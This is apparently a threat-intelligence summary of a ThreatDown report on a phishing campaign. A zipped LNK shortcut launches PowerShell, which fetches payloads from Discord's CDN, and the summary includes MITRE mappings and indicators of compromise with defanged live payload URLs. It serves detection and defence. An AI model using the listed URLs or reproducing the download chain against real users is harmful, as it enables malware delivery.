Threat Research

New Phishing Campaign Leverages Discord for Payload Delivery – ThreatDown by Malwarebytes

Securonix

A new phishing campaign uses Discord’s Content Delivery Network (CDN) to deliver malicious payloads via a zipped attachment and a PowerShell-based download chain. ThreatDown MDR recommends immediate endpoint isolation and blocking the implicated Discord CDN URLs to mitigate further impact.
#ByelongBound.exe #FASF240110.pdf #pumairld.txt #viverosmarinos #ThreatDownMDR

Keypoints

  • The phishing campaign was identified after an MDR client clicked on a malicious zip file.
  • The attack started with an email containing a zip file named DOCUMENT-12545403-8265-5454-434354-430854546.zip.
  • Inside the zip was an LNK shortcut that executed a PowerShell command to download code from a remote text file.
  • The remote text file viverosmarinos[.]com/pumairld.txt downloaded ByelongBound.exe and FASF240110.pdf from Discord’s CDN and executed them.
  • The campaign leveraged two Discord CDN endpoints to host the payloads.

    • <liMitigation included endpoint isolation, password updates, system re-imaging, and blocking specific URLs to disrupt the chain.

MITRE Techniques

  • [T1566.001] Phishing – Spearphishing Attachment – An end user receives an email containing a zip file disguised as a PDF that initiates the infection when opened. “The attack began on June 19, 2024, when an end user was sent an email containing a zip file named DOCUMENT-12545403-8265-5454-434354-430854546.zip.”
  • [T1059.001] PowerShell – Command and Scripting Interpreter: PowerShell – A PowerShell command in a shortcut downloads and runs code from a remote .txt file. “The LNK file contained a PowerShell command to download and run PowerShell code from a remote .txt file.”
  • [T1204.002] User Execution – Malicious File – The user clicked the LNK file thinking it opened a PDF, triggering the infection. “they inadvertently initiated the infection process.”
  • [T1105] Ingress Tool Transfer – The remote text file directs the download of additional payloads from Discord’s CDN. “downloaded a text file… which downloaded a malicious executable, ByelongBound.exe.exe, and a PDF, FASF240110.pdf, from Discord’s CDN.”

Indicators of Compromise

  • [Domain] viverosmarinos[.]com/pumairld.txt – hosting the remote PowerShell payload script
  • [Domain] cdn.discordapp[.]com/attachments/1232305208034463761/1252890126124585021/ByelongBound.exe – hosting the executable
  • [Domain] cdn.discordapp[.]com/attachments/1232305208034463761/1252890163399364659/FASF240110.pdf – hosting the PDF payload
  • [File] ByelongBound.exe – malicious executable downloaded from Discord CDN
  • [File] FASF240110.pdf – malicious PDF downloaded from Discord CDN
  • [File] pumairld.txt – remote text file that drives payload retrieval
  • [ZIP] DOCUMENT-12545403-8265-5454-434354-430854546.zip – email attachment used in initial phishing delivery

Read more: https://www.threatdown.com/blog/new-phishing-campaign-uses-discord-for-payload-delivery/